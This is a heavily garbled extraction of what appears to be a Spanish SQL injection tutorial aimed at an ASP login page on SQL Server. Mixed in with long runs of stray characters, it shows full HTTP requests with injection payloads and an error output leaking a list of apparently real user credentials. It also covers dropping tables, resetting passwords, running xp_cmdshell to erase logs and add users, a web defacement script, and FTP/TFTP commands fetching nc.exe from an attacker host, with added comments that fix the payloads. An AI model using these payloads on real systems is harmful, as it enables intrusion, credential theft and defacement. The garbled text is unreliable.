ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun,
16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private
Object Moved
This object may be found here.
:M
"
9 =&
" )" 6
"
+
)
".
> "
"8
> 8
9
" 9 & )
" .
*
)
" .
"
>
>
"
( "
#8%8'; .
E/
"1
F A=4 " 9
"
" !:#; ;;! 1: "
&"
9
"
" "
6
.
"
" "
"
) "
"& 4
6 9
#$%
6
+
E8"
" L.
6 . V 00F
,
*
"
)+
&
"
"
&
.
)
9
9
"
"
9
"
*
,& "
"
9
"
"
"
"
,& "
&
"
"
"
"
+
" "
" "
(
'
"
.
"
"
"1
) & "
*
"8
"
) &
" "
"" . "
9 ;:,:# "
"
#8%8'; .
&
"
"&
"
"
#8%8';
"
+ 9
*
" II 6
"
4
< " #
" "
.
SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x
AND campo5=y
(
)
=
" ) =
.
*
"+
)
7
"
"
"
E8"
"
>& >
<"
>
?> E, *
"
>#8%8'; _ A : ` a>
"
"
"
"
7
F "
(
. "
"
) "
>
>.
)+> + > 6 .>F "
> + >
2>&
"
9
"
="&"
* )
" "
"
"
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 297
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy
sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3
D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro
m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na
me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
. "
Y
Y
H
+
"L
"
)
& & & *
"+" )4 " & "+"
"
)
V)
VL "
"L
)
E"
)
*
"+" )4 " & "+"
")
V)
VL "
"L
)+
" F
)+ 00
> ">
9
"
"
) "
"
" III H
"&
(
"
+
=
9
"
" # *
"
(
"
.
&
"
"
+
% .
"
1 :1
"
.
+ 9
"
"
"
&
"
"
"
" ) "
""
#S#:-b8';# + #S#':%
1#
"
> ,>
*
9
" )
"
6
(
"
;:! E8 "
"
F %
" "
"
(
1
6
9 "
" 6
"
#8%8';
7 " "& "=
*
9 )
6 "
"
B
4
;:!&
"
"
;:! F
;:,:#
6
!:#;
%
" 9
=
"
"
9
.
)4
)
)
"
"
"
6
"
"
"
.
"
"
" &
Ups' union select b.name,1,1,1 from sysobjects a,
syscolumns b where a.id=b.id and a.name='usuarios' and
b.colorder = 48 -7
"
"
" E!
>F
" >
!
6
"
&
4
4
9
"
"
"
"
4
"
" "
+J
")
"
7
"
.
(
"
4
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07' [Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the nvarchar value
'UserSubPLUSDate' to a column of data type int.
/Login.asp, line 85
:M& 6
"
:,-' "
" 9
)
# 5 :# " > " # )!% #, > % .
6
".
;:! + " .
)
"+
"
:-
.#
5
".
)
!
#&
&
6
"& "
)
"
&
"
"
&+
" &
) "
"
&
>#
9
)7 "
" " % .
"
D
*
"
"
*
"
#
"
+
" 6 (
9 "
"
) "
) + "
" 9
"
#$% > 1 :1>&
"
6
.
" "
EF> "
# )
"
1 :1
"
"
"
" >) " ">
. 4 #$%&
" 9
" J
" *
"& " )
J
6 " ) "
" !
4
&
"
1 :1& "
"
"
>
" "
"
"
" ) "
"
!
"
EF&
" )
"
7
9
"
*
"
"
J
>&
"
)
.
C
5
9
(
"
"4
;
) "
&
"&
"
".
.
" .
"
"
6
"
" 6
"
4
< +
7
"
+
"
"
*
9
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 82
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu
arios--&txtPassword=Angel
Y
Y
Y
H
9
6
"
>! ""
>
Y
*
. "
Y
H
+
L
"
" E ,F& & & *
"
"00
6 (
"& .
!:#;
"
<
6
".
4
"
" 6
"
=
6 & )
)4
1
"
"
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]The sum or average aggregate operation cannot take
a nvarchar data type as an argument.
/Login.asp, line 85
)
"
"
&
9
"
"
I8
, )
)
"
"
,>
9 "
" 6
E>
"
(
" "
&
"
"
"
6
9
6
"
4
4
" "
"
F
1:&
" 9 =
6 :,-'
"
" )
9
( "
6
" "
"
"
"
"
)
& "=
&
+
)
2
"
" 6
" #$% ) "
#$%KK&
"
8
"
"&
"&
"
"
"
"
)
#
"
"
)
"
"
)
" E! "
"
"
"
+
) "
"9 ".
4
6
"
6
&
.
"
""
"& "
.
#$% ! . *
& )" 6
1 &(
!
# 5 :#
6
6
" D
"
"
6
, "
.
)
"
&" *
"& "
"
)4
6
"
" "
" #$%
1 :1& 9
"
"
"
( & ; !: ,8 ,5;: 9
" "
9 "
#$% "
"
(!
*
"
9
9 "
<
="
>#
>
& #$% "
"
"
"
4
"
9
"
<
"
&
6
7
"
"
"
"
"
"
"
"
"
8
"
I
#$%
"
+
"
" 9
1H5 ' 5
" "
) "
" " ! <1
" " !
M
" " %"#
"
" " ,
" " ,
M
" , E1 )
"
"
#
" !G# E'
" D F
"
+
"
"
"
<
"
!
&
"
> > .
>
" E!
.J
&
"
" "&
"
"
)
"
"
)
"
)
"
"
6"
"
>
>&
9 ;:,5 *
"
)4 6 & b 1;5
)
+8
>
.
" ,
&
"
&
9 F
.
.
"
&
""
.
)
6
"
"
EA
7
4
"
+
>5 6
6
"
" 1H5 ' 5
" >9 4
>
#
" 6"
4 # #
"
" " # )!% #,
"
" "
."
,
"
" " ! ) ! *
"
" " ! *
M
"
" " ! * "
"
" " ! <#
"
'
(
"
.
-
"
"
" 4
" F
"
"
.
&9
"
<
' " 5 +
` a>& #$%
&
6
"
"
"
" 4 "
9
"
" "
" 4 "
*
> ,>
8"
*
IIF
"
!
:M&
4
*
*
"
(
" )
"& . "
" +
"
F
"
"
> .
F 9
"
" 9
" .
" " ) "& + " "
*
>86
"&
"
""
"
4
E%
"
9
9 "
+
2
4; !
6 (
" "
" )4
*
"
6 &
#!
!
.
!<
#$%&
!&
(!
(
"
*
(
.
"
>)
6
"
) "
" 7
" 9
"
)
"
=
#
(! , 8 .=
.
"&
. &
"
"9
"
"
A=4 " 9
*
4 . "
"
""
(
7
" " "
!
> $6 3 /
%
#$%
"
*
H 6
.
."
"
6 !:#;
>
*
)
)
.
"
"
"
"
"
) "
)
6
"
*
&
"
(! 6#; !
"
) "
E% 9
"
6
"
"
" *
"6
"
6
"
"
& "
(
*
1;:
9 " .
"
6"
(
F
*
"
" , + !G#
F+6
"
*
9
) =
+
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D
%27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3
B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in
to+xtmp--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
2
H
+
<V
W
<
L
[L L[
<[
-> $6 3 , 8
<6
"[L]L*
.
6 ( "
#8%8';
!
EB
"
"
F"
<VLL "
U
<"
< "
(! 6#; !
"
&
"
)
)
"
(
"
<
+
7
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 76
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-&txtPassword=Angel
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
)
"
(
"
*
"L
"
)
"
!:#;
" 4
*
<& & & *
*
<
00
&
"
"
6
*
:,-' 6 6
.)
"
.
" "
Login de Usuarios Registrados
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the varchar value
'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14
05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay
ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk
a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
22
carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85
2> $6 3 4! &
!
6 ( )
(
, :!&
"
"
"
"
(! 6#; !
") "
&
"&
"
)
" .
4
".
+
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
.
Y
H
+
L]
) <
00
- 6!
;
"
!
"
"
6 " "
"& 9
""
"
"
")
." "
"
"
(
"
.
6
6
" .
)
"9
&"
"
.
" 5
"
"
"9
) "
"
"
*
&
"
"
"
"""
"&
*
&
" "
"
. .
"
$+6 4
H
"
""
!,5;8
4
9
"
"
"
.
"
""
6=
!:#;
+
(
"
23
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 103
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2
7+where+uid%3D%27Carla%27--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
L
"
""
"VL1 6 ! ""L
VL'
L00
+4 4 4
#
&
.
+
9
"
*
"
E5 9
."
9
"
H
"
#$% # 6 F
!:#;
"
&
.
"
*
'delete from usuarios where UID='Usuario'--
+
1 4
$
"
4
"
" "
&
4
1#8 ;& )
&
" "
9 +
" "
"
&
KKKF
9
"&
" "
"
"
"
" 6
.
"
.
=
"
(
"& +
"9
9
6 "
"
)
"
7
.
"
"
&
"
"
)
"
""
")
"
(
" E'
"
&
(
!
. & +
"
4
. 9
=
6
"
9
" "
2?
5"=
"
".
"
&
"
9
=
(
"
.
" )
"
9
<"
" " "
" ) "
&
9
" "
"
!:#; 6=
:)6
7<
*
9 "
+
.
"
"
"+" " "
1#8 ;
*
"
4
"
"
+
&
"
+
&
6
"
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 113
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser
%27%2C%27MyPassword%27%29--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
L] "
"
"6
" EL + " L&L +! ""
LF00
% &
"
(
&
!
.
!
.
" 7
"
"
)
" 6"
"
&
<
""
"
"
"
*
6
"*
" >8<
"
#$%
1:
"9
#
!
4
*
"
"
"
*
"
"
!
)
(
"
&
"
.
" * #$% # 6
">
"
"
$
% "
) "
II
.
#
"
"
"
6 "
?4;
<
$
" "
"
"
8< "
"
#0#$%& "
")
" 5
.
" "&
#
" & ,%%L" 9
"
&
*
#0#$% )
<
"
"
")
"
"
"
" <
"&
.
2@
"
"
&
"
5
" <
"
"&
" )
*
)
" *
"
"
"
N Q
"
> ">
4
"
"
"& "
"" "
" < Q
"
"
K6
" ;;!
) "
" "
"
"
4
"
"
"9
"
( =
"
"
""
" "
9 "
"
+ "
"
"
(
6 6= #$%
" ".
"
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe
+dir+c%3A%27--&txtPassword=Angel
Y
Y
Y
H
9
6
"
Y
>! ""
>
*
Y
. "
Y
H
+
"L]8N8' "
) < Q
"
L
<
L00
:M
9
E
,
)
"
"
"
6
=
)
" *
"
" *
5
" "
)
.
4
"
) 4
"
=
)
&6
6
" " =
"
4
& "
"
"
)" 6
"
* "6
"6
" E8 "
"
"
"F
+
< Q
)
) 4
")
"
>
>
"
"
< Q
(
"
.
"
*
"
"
"*
E/
&
.
&
"
"1
&
9
#5
F
"
"
9
"
" & F
"
"
2
!
"
EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\'
! 6
9
6
EXEC master..xp_cmdshell 'type
c:\inetpub\wwwroot\alguna_pagina.asp'
!
"
)
EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe
c:\inetpub\wwwroot\chroot.exe'
! )
"
EXEC master..xp_cmdshell 'DIR
c:\winnt\system32\logfiles\w3svc1\'
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicación en
World Wide Web"'
EXEC master..xp_cmdshell 'del
c:\winnt\system32\logfiles\w3svc1\
filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de
publicación en
World Wide Web"'
!
6 "
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'
!
"
6 G
"
EXEC master..xp_cmdshell 'NET USER username password'
:M&
"
)
.
"
8<
" "
"
.
">&
"
"
"
" #
" >8<
#
"
)7 )
" +
!
">&
"
"
"
"
&
>1
4 "
"
'exec master..sp_addlogin MyUser, MyPass
9
;
"
"
!
"
=
" .
" "
)
6 &"
*
&
.
. "
)
&
"
"
"
"> + >8<
#
!
"> 9
) =
" " ! "
"
" "
"
&
#0#$% # 6
"
*
"
"+" " "
6 "*
"
"
" )
"
9
" " >#
"
"
) "
"*
"
+
"
"
2B
"
"
"
"
"
Q
Q
Q "
Q *.
Q "6
+
)
- $ %+ )
%
"
"
"
4
&
)
*
(
)
Q
.
Q
) "M
Q .
Q .
Q .
M +
& *
"
"
*
+
"
%
"
<
<
<
<
> *
"
+(
9
:,-'F&
"
"
"
322&
9
" # )
7
9
9
<
<
<
<
<
&
"
"
" "
"
"+ 7
'
4
"
&
"
"
" H
"
" .
"
"
"
(
"
"
"
) 4
"
" +
#$%
9
4
>
"& 9
"
"
(
67"
<
#$% E$ +
" #$% 6=
#5& " )
*
" #$%&
) "
""
)
"
& ".
"
.
"
1 &
M
<&
6
Q .
6
Q" 6
Q
"
Q
Q 6
.
&9
4
.
"
>
. (( #
<
" "
" . "* .
"
+
"
.
.
*
+ ;
"
>&
7
"
"
----- Extracto -----------------------------------------[...] La idea es crear una página HTML o ASP, si en
el sitio objetivo se encuentra activo y funcionando un
webserver [...]
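-- Defacement via the OLE Automation procedures: sp_OACreate instantiates
-- Scripting.FileSystemObject, CreateTextFile opens (and overwrites, 2nd arg = 1) a
-- file under the target's web root, and each sp_OAMethod 'writeline' appends one line of
-- HTML to it. No xp_cmdshell involved, so blocking xp_cmdshell alone does not stop this.
-- Fix: a stray page number ("2C") from the document extraction sat in the middle of
-- the listing and would have been a syntax error; removed. The HTML literals are kept
-- byte-for-byte (line breaks inside them are harmless in HTML).
-- NOTE(review): @t is declared but never used, and the @ret values (HRESULTs from
-- sp_OAMethod) are never checked, so a failed write goes unnoticed.
-- NOTE(review): the output path is target-specific and is the file an incident
-- responder should hash/compare first.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\web-hosting\attajdid\index3.html', 1
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD>
<BODY text=black bgColor=#000000> <CENTER> <P><B>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT face=Arial color=#b4b58c size=7>Vosotros
</B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-></P>
<P></P> <CENTER> <P><B><FONT face=Arial
color=#b4b58c size=7>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros
vuestras
</B>WEB<B>s!!!</B></FONT></P></CENTER>
<P><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV
align=center>
<CENTER> <TABLE cellSpacing=0 cellPadding=0
width=100 border=0>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY>
<TR>
<TD bgColor=#d20000> </TD></TR>
<TR>
<TD align=middle bgColor=#ffff00>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT color=#ffff00
size=1>¡ORTO!<BR>¡¡¡Va
por vosotros!!!
</FONT></TD></TR>
<TR>
<TD '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'bgColor=#d20000>&nbsp
;</TD></TR><!--" "-></TBODY></TABLE></CENTER></DIV> '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<P><BR><BR><BR><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00 size=5>
lagear & runlevel</FONT></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00
size=4>Recuerdos a
<B>N</B>9<B>Team</B></FONT>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P
align=right>
<FONT face="Courier New" color=#00ff00 size=3>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te
podemos
encontrar BreakICE?</FONT></P> <FONT color=black>"
</FONT>
</BODY></HTML>'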
Para subir archivos.- Creamos un archivo de comandos get.txt para
utilizarlo luego con FTP (modo script):
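-- File upload to the target via a scripted FTP session. The OLE Automation procedures
-- write c:\get.txt line by line (the answers ftp.exe will read instead of the console:
-- user, password, re-login as anonymous, fetch nc.exe, quit); xp_cmdshell then runs
-- ftp.exe against the attacker-controlled host ('NUESTROHOST' is a placeholder).
-- Fixes relative to the listing:
--  * 'master.xp_cmdshell' (single dot) does not resolve; the rest of the document uses
--    'master..xp_cmdshell', which is what is meant.
--  * Windows ftp.exe takes the script as '-s:filename' (colon, no space).
--  * 'user anonymous' and 'get nc.exe' were each wrapped across two lines, which would
--    have split them into two script lines; joined here.
-- NOTE(review): ftp.exe normally defaults to ASCII mode, so a binary such as nc.exe
-- is liable to arrive corrupted unless a 'binary' command precedes the 'get' — the
-- original script omits it. @t is unused and @ret is never checked.
declare @o int, @f int, @t int, @ret int
EXECUTE sp_oacreate 'scripting.filesystemobject', @o out
EXECUTE sp_oamethod @o, 'createtextfile', @f out,
'c:\get.txt', 1
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit'
EXECUTE master..xp_cmdshell 'FTP -s:c:\get.txt NUESTROHOST'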
o, algo más fácil, si tenemos un servidor TFTP en nuestro host:
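-- Same upload using the Windows tftp client: '-i' selects binary (octet) transfer;
-- GET copies the first path from the attacker's TFTP server ('NUESTROHOST', a
-- placeholder) to the second path on the target.
-- Fixes: 'master.xp_cmdshell' (single dot) does not resolve — 'master..xp_cmdshell' as
-- elsewhere in the document; the quoted command was wrapped across two lines and is
-- joined here.
-- NOTE(review): outbound UDP/69 from a database server is rarely legitimate and is a
-- cheap egress rule / detection for this whole technique.
EXECUTE master..xp_cmdshell 'TFTP -i NUESTROHOST GET c:\mi_local_file c:\remote_file'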
3
----- Extracto -----------------------------------------:M&
)
)4 "
6 " *="
" "
"
"
# 6
"
.
E
.
" 9
" 8
"
4
"
.
& ) "
" "
"
(
" *
"
6" "
#0#$% # 6 &
")
"
.
"
" &"
" Q
+" Q
9
"
"
)4 :%8
"
" * #$%
"
. * "+"
)4 F +
"
7
"
)4 6
" )
"
"
;
" Q
. &c " &
M : ;! ;
< a
)4
`&
;
" Q
)4
`&
6
`&`
`
aa
M &
: ;! ; a
Va
"
3
# )
"
" ) "
9
7
9
&
"IF
*
)
5
*
+
"
7"
6
"
"
&9
"&
"
6"
"
"
"
.
" D
"
)
+ =
" &
J
" "
"
)
)
"
"
*
"
"
>;
""
"
" ) " "
& "
+
"
. &"
7
"
"
:
.
"
"
G )5
"
"
"
L 1;: : ;A %8L
>
>
+ =
"
"+ )
&
+
#$%
9 6
)
<"
6
"
( " E: ) =
"
*
" " "
#$% +
"
)
#
"
"
+! 4 >
"
"
#$% 4
*
#
'
%
#0#$%
)
.
") " "
0
,
"
"9
9 "
.J
#$% 4
) 4
"
! "
` : ;! ; a
= "
"
J
""
"
+
3
03 !
# )"
" ") "
1 :1 " )
H
"
1 "
J
"
""
0 +,# )"
" ") "
1 :1 " )
!
"5
1 "
J
" E *Q* KF
"
"
""
"
"
F
0$ .
#
':!S E8 "
# )"
" ") "
1 :1 " )
!
"5
J
""
""
"
" ) "K
0
# )"
" ") "
1 :1 " )
!
"5
"
J
""
""
" ) "K
"
" ""
"
E< Q
"
&" Q
" F
"@ %
"
*
&
A
.
*
7
"
'
"
" .
.
" .
"
&
9
"
& "
4
"
&
"& "
7 . "
6
7 . "
6
"
.
*
%
"
"
" *
" 6
"
)
"
"
"
"
".
(
#0#$%
"
"
"
"
"
"
" "
(
"
(
&
")
6
"
)
)
# 6
" " 6
"
"
"9
" J
" " 6
" ) "
"
"9
!
4 *="
" "" 6
8" ) (
! =
'
(
# *
*
"
"
<
+
" ;'! 322 + ,! 323F
1
"
" 6
" )
"
" 6
1
"
"
=
& "
"
"
"
! M
""
""
6
"
A
" 6=
"
"
) "
=
" 8"
"
6
#$% " 6
3
! " " "
.
" .
*
.
E,
" 6
"
) "
""
" . ( &
M"
)
*.
F
H *9
6
"
"
"
"
"
#0#$% # 6
8" ) (
"
6 . "
"& " )
"
" 9
(
" "
"
"
8" ) (
6 "
" .
6
"
* "
*
E
"
"
" .
) 0
"
"
"
*
(
"
M
" "
MF
8" ) (
""
*
#5
# "
9
" .
&
" "
"
*
"
."
6
#0#$%
6 '
1
4
)
) "
"
6
" "
"
"
" "
.
"
(
"
.
" H
6 )
"
"
) "
" ' 9 "
"
"
"
" "
"
"
" >$
> "
"
" 9
" " .
) "
"
"A %
B
#0#$% # 6
"
6 "
" 6
" .
&
9
.
6 (
"
" "
"
'
"
6
" .
6
8
!
"
"
.
9
"
"
*
"
& +" ")
" 7
" +
" " *
" "
"
") " "
" ) + +"
(
"
"
"
) 4
"
6 " " " .
"
&
"
"
+
"
""
") " & ")
<
M ." )
#0#$% # 6
"
"
6 & <"
"9
"
"
+ "*
"
" +# 6 "!
" )
"
"&
6 "
" .
G
"
" "
"
" . > +
"
"
"
) = 6 " #$% 4
# )
*
"
"
*
M .
*
"
"*
"&
"
"
) =
"
.
6
)
"
)
" " " "
" . (
# #;8 5 G
"
.
(
M"
".
"
)
"
.
"
""
" 9
" ) "
+ = "
7<
" +
"
"
8
" G
"
""
"+
"
"
"
"
6 " E;
"
"
9
"
"
"
" 7
"
"
"
"&
6
"
"
"&
.
" .
6"
"
" .
"
"
" . "&
" "A
= &
*.
" ""
* "
*
& " )
"" 6
>
.= " )
"
)
"
*=
4
& 74
.
"
&
"
&
"
*
"
"
#0#$%F 8"
. " D " ". *
)
32
'
6
G
"
2& + "
" ")
"9
" "
"
" )
"
" " .
E5
(
" 5
"& ,
6 " # .
& 8A#& F "=
)7
%81;:
" *
"
( " "
"
"
* & "
"
9
".
)
"
"
#0 #& #0#$%& # "
" 8 !&
"
"
)
( "
*
&
"
.
&+
9
#:- 8 " "
6
5
"
"
"
9
#
"
9
+
" " "
"
"
6 " .
6"
"
"
"
"& +
5 " >5 . !
"C
)
"
+ " 6
"
"
"
"
>
"
*
7
" + %
" 9
"
#
M . 8< "
M
.
"9 "
7
" #$%
" '
"
<
% & ! &
G
"
> E #-1 B303B 022CB0@F
M
"
Q QG
"
"9 "9 Q 3
+
" *
"9 6
6 " +
"
+
"
" #$% 4
G
!
*
"
"
"
.Q#$%Q# 6 Q " .Q#$%Q 4
*
< . ""
" 6
Q"9 Q 4
*
< . ""
"
Q 6
Q"9 Q 4
*
< . ""
" 0#$%
*
< . ""
"
M .0"9 0 ""
" *
< . ""
"6
.Q
) " Q"
+ *
"
"
+ 6 " ?,! 1 ! @8
"
. "
Q6
"9 "
"
"D
!
M "
M "
M
"
"
<
+
+
*
.'
"
M M
M " #9 )* (
+9
"
" 5
&
>
*
- M >
"
"
"*
4
" )
&
">
<
6
6
33
M
M
M
M
"
"
"
"
<< "
"
"
"
"
"
+ . 1; "
" #9 M (
+ . G "9
<
+ . G "9
.(
+ +
. )5
"0 0 @0) (
"
"*
"
"
" M
+
"B
01
0
0'
0S
"
"
, :!
"9
" . II )+ 5 .
' % . "
"
" *
" )
")
"I )+ 5 .
6.
8
"
*
* "
*
"
)+ 1
F )+
"
59 =
. &
" 6 =
"
.
"
= &+9
.
"
)
9
"
" .
D
. &
.
1
"
(
+
.
6
"
"
" "
"
"
"
. (( #
+ ;
>
> < 1
)
" )
"
"
"
+
9
"
")
6
9
9
"
"
" " "6 "
"* (
"
" ") ( "
9
"
"
"
(
&
9
" *
"9
"
"&
" < ") " ""
"
"
"
"
"
"
"
)7
. "
"
/
"
"
6
" *
" *
;
"
&
=
"
"
MQJ
% ! (
(
**
= "
.
"
"
;
"
"
/
!
9
"
#
& .
" " "
5 " >5 . !
=
#0#$%&
"9
+
67"
"
+# *
"
" .
" "
#$% 4
% d
" "
"
*
>
9
"
&
# 9
. "
"
E8"
"
"
"
"
.
"J
. "
<"
" "
" " .
"KF
"
"
9 D
"
+*
O1 <